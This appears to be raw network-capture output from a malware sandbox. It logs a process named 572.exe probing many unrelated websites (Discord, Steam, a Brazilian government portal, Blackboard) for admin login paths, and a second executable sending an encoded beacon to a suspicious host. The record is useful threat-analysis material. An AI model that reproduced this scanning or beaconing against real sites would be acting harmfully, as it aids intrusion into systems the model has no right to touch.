                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://nuevopacto.runacode.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lp7dai8UB%2Bw7humFtXM%2BanNA83WKqndlYd5zXZxXRpfdP3VmAQMW0T5VxuGy1Hsv0yNponDHv2vOPAK0YvYiXzgNS18NcMZrdNV9MuJcuAzFOdHdQG1qVBK68yjjAVq30Ut%2BnVQEpfFg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd415e98244e-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                213192.168.2.65536645.60.74.5080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.508348942 CET187OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zuhauseplus.vodafone.de
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                214192.168.2.65536487.233.198.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.508502960 CET189OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.702135086 CET126INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/administrator/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                215192.168.2.655634179.191.175.6680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519718885 CET201OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: servicossociais.caixa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.667617083 CET1017INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: azion webserver
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzma=f87892b0-a2fe-41d6-8544-af3f63dc29a8; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzmb=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzme=2788; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzmc=546391087875; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzmd=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Location: https://servicossociais.caixa.gov.br/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                216192.168.2.65570323.4.32.21680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519718885 CET177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.627239943 CET183INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                217192.168.2.655637172.67.184.5980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519718885 CET170OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hartico.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.647267103 CET669INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://hartico.tv/admin.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BrMLjtlwijSEEhdkaDEJLCFJPJmxlIIt000cHnrBEiO%2BgO6GVNVJifNOujpMnp8aANWpFAGp3ENovAPNJ1xYEEd65%2Bz%2FGhOJaJSRg3NC%2FvSf%2BQaBluXY1jXSuzwvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb70588eb0b7-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                218192.168.2.655646104.26.14.18080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519777060 CET180OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.651271105 CET1286INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://aeaaamorim.inovarmais.com/admin
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZgabrWQpZ2Bi7xSD9KsgS%2BQp5LnyHWvzSlneJLw92puC5MT9jy4ONH%2FPn2ttmolIv7qabaZTfnXn3jzr%2BHZdGdjMqw3Gy2%2Bs7%2BUF5hfCa65oEVTebGMfaY9ezev3C8vU464c3vd%2BYbl1mfM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/csp-reporting.cloudflare.com\/cdn-cgi\/script_monitor\/report?m=2_zS2z5q4IP7tdk7qutJxWjpICOi2ek42ItH8dNRCxE-1707131691-1-AT4rMnkuT1zb7YZii_QPAW-eqZcJ-Z9fULUlZXiabBSclL8GSHUUEf8zb6sPBocsTMDJDP1ghFbh1TP_mozmz2XDb9o8KYCV1JP0F5OsISgtTUURq7JbcSRWWeVqHJ44E4KLspFSpGK9CxSTn4nshVj0onxh_G8mO6NyZi0oJrmA"}],"group":"cf-csp-endpoint","max_age":86400}
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'none'; connect-src 'none'; report-uri https://csp-reporting.cloudflare.com/cdn-cgi/script_monitor/report?m=2_zS2z5q4IP7tdk7qutJxWjpICOi2ek42ItH8dNRCxE-1707131691-1-AT4rMnkuT1zb7YZii_QPAW-eqZcJ-Z9fULUlZXiabBSclL8GSHUUEf8zb6sPBocsTMDJDP1ghFbh1TP_mozmz2XDb9o8KYCV1JP0F5Os
                                                                                                                                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.651288033 CET176INData Raw: 53 67 74 54 55 55 52 71 37 4a 62 63 53 52 57 57 65 56 71 48 4a 34 34 45 34 4b 4c 73 70 46 53 70 47 4b 39 43 78 53 54 6e 34 6e 73 68 56 6a 30 6f 6e 78 68 5f 47 38 6d 4f 36 4e 79 5a 69 30 6f 4a 72 6d 41 3b 20 72 65 70 6f 72 74 2d 74 6f 20 63 66 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: SgtTUURq7JbcSRWWeVqHJ44E4KLspFSpGK9CxSTn4nshVj0onxh_G8mO6NyZi0oJrmA; report-to cf-csp-endpointVary: Accept-EncodingServer: cloudflareCF-RAY: 850abb705e1e7bd6-ATL0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                219192.168.2.655638162.159.136.23280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519778967 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.647284031 CET939INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FLjzAygHd1lJKQZQ3BuzGDSlKg3OMLyhEDZaM9yUC8Ytwfbn8LZqUA%2BrQAmfSzS1XJUCuUMaBm4hC%2Fdvei7f3kvJBxOQq6Ooyxht3TBQlpxZeDBiPReS%2BFt1w3Z1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=43d319574067941d37094b6910829d6525079fae-1707131691; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=sVVx08cM5ITR7IypNv13N3eDZEkWIVe_dlzDoWncuYk-1707131691581-0-604800000; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb705845b163-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.982156992 CET333OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cfruid=43d319574067941d37094b6910829d6525079fae-1707131691; _cfuvid=sVVx08cM5ITR7IypNv13N3eDZEkWIVe_dlzDoWncuYk-1707131691581-0-604800000
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                220192.168.2.655645104.21.34.3480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519779921 CET187OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: virtuadopt.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.647795916 CET687INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://virtuadopt.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qyDG4HZ5GAdv2%2F5Wo5%2BuqN82Zj3XiQjTUl8%2FcGDQD1S0rO8vnytGKpzW0l8xOBOq62mGm6XutWXhWzb3Ju0SQVN%2FYHbxKNKnndxa0fjdVkfInALk9fXfoI310FCMViCQ1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb705d5a69f8-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                221192.168.2.65564054.158.51.6080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519794941 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.635493040 CET585INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB7447B8839F065D505ACBA1ADA2DE0F271580654393A212BA35D0119823AFA8A307D569A0E8112D003B8DF13162B7579F233;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.981287003 CET346OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB7447B8839F065D505ACBA1ADA2DE0F271580654393A212BA35D0119823AFA8A307D569A0E8112D003B8DF13162B7579F233
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.097083092 CET373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                222192.168.2.655636104.255.105.7980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.519890070 CET183OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.640607119 CET146INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://signin.rockstargames.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                223192.168.2.655750185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.554579973 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.795129061 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                224192.168.2.65570420.192.98.16080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.556675911 CET196OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: easygold.joyalukkas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.930661917 CET157INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://easygold.joyalukkas.com/administrator/index.php


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                225192.168.2.655741185.78.166.13080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
